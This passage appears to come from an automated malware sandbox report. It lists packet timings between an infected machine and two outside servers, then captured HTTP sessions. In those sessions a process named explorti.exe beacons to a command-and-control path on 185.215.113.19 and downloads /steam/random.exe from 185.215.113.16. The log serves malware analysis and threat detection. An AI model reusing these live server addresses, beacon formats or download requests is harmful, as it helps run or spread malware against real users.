Sep 1, 2024 20:09:54.583018064 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.583157063 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:54.583157063 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:54.583647013 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.583657980 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.583669901 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.583678961 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.583734989 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:54.583796978 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:54.783849001 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.783941984 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:54.784023046 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.784048080 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.784126043 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:54.784164906 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.784178019 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.784188032 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.784213066 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:54.784276962 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:54.976162910 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.976176023 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.976191044 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.976360083 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:54.976489067 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.976499081 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.976509094 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.976588011 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:55.782494068 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:55.782568932 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:55.782634974 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:55.782769918 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:55.974914074 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:55.975080967 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:55.975080967 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:55.975095034 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:55.975136995 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.168065071 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.168118954 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.168184996 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.168198109 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.168226004 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.168248892 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.168272972 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.168291092 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.168312073 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.168324947 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.368510008 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.368521929 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.368673086 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.368673086 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.421868086 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.421915054 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.421924114 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.422055006 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.422055006 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.422055006 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.576926947 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.576996088 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.576997995 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.577014923 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.577043056 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.577055931 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.577188969 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.577228069 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.661648035 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.661669016 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.661679983 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.661705971 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.661724091 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.759737968 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.759766102 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.759777069 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.759963036 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.759965897 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.760015965 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.844445944 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.844459057 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.844659090 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.938143969 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.938167095 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.938216925 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.938231945 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.979187012 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.979239941 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.979324102 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.979336023 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.979377031 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:56.979485989 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.979497910 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:56.979528904 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.015136003 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.015217066 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.015625954 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.015677929 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.176048994 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.176098108 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.176119089 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.176301003 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.176301956 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.176328897 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.176342010 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.176353931 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.176378965 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.176395893 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.261218071 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.261238098 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.261382103 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.261382103 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.370615959 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.370748043 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.370759964 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.370774984 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.370793104 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.370820999 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.370831966 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.370842934 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.370881081 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.371756077 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.371766090 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.371808052 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.462763071 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.462799072 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.462913036 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.462913036 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.574018002 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.574032068 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.574043036 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.574069977 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.574106932 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.659928083 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.659939051 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.660000086 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.944672108 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.944701910 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.944734097 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.944900990 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.944900990 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.944947004 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.944960117 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.944974899 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.944987059 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.945030928 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.945086002 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.983901978 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.984015942 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.984045982 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.984078884 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.984170914 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:57.984222889 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:57.984646082 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:58.072571039 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.072591066 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.072819948 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:58.072885036 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:58.156892061 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.156949997 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:58.157058954 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.157099962 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:58.185322046 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.185338974 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.185349941 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.185383081 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:58.185409069 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:58.272561073 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.272572041 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.272581100 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.272624969 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.272689104 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:58.272751093 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:58.387331009 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.387582064 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:58.387613058 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.387624025 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.387633085 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.387644053 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.387703896 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:58.387818098 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:58.465984106 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.466124058 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:58.466218948 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.466229916 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.466239929 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.466315985 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:58.583005905 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.583035946 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.583045959 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.583056927 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:58.583194017 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:59.304749966 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.304826021 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:59.304922104 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.304961920 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:59.504771948 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.504853964 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:59.504872084 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.504884005 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.504894018 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.504916906 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:59.504942894 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:59.713466883 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.713493109 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.713502884 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.713597059 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:59.713690996 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.713702917 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.713711977 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.713723898 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.713850975 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:59.913130045 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.913180113 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:59.913321018 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.913333893 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.913374901 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:59.913938046 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.913949013 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:59.914000034 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:00.123724937 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:00.123743057 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:00.123753071 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:00.123778105 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:00.123801947 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:00.124042034 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:00.124053001 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:00.124062061 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:00.124084949 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:00.124095917 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:00.124106884 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:00.124126911 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:00.124152899 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:00.208405018 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:00.208446980 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:00.208709002 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:00.208750010 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.018348932 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.018413067 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.019151926 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.019201040 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.236757994 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.236812115 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.237231970 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.237279892 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.321461916 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.321474075 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.321512938 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.460170031 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.460180998 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.460191965 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.460222006 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.460252047 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.460272074 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.460283041 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.460294008 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.460305929 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.460319042 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.460352898 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.670428991 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.670593023 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.671142101 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.671188116 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.720956087 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.721004963 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.721014023 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.721026897 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.721060038 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.721283913 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.722563982 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.837424040 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.837481022 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.837538958 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.837666035 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.887200117 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.887242079 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.887248993 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.887257099 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.887295961 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.887417078 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.887429953 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:10:01.887456894 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:10:01.887475967 CEST	49738	80	192.168.2.4	185.215.113.16

HTTP Request Dependency Graph

185.215.113.19

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 20:09:04.784384966 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 20:09:05.654714108 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 18:09:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 20:09:05.657558918 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 37 32 41 37 38 42 31 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7AB72A78B15E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Sep 1, 2024 20:09:05.968554020 CEST	466	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 18:09:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 31 33 0d 0a 20 3c 63 3e 31 30 30 30 30 35 31 30 30 30 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 34 66 66 66 37 62 35 63 36 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 30 30 35 32 30 30 30 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 34 66 66 66 37 62 35 63 36 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 30 30 35 33 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 30 65 65 66 65 62 38 38 34 36 64 39 33 34 66 34 38 62 31 35 65 61 61 34 39 35 63 34 39 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 113 <c>1000051000+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1000052000+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1000053001+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb0eefeb8846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	185.215.113.16	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 20:09:05.984725952 CEST	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
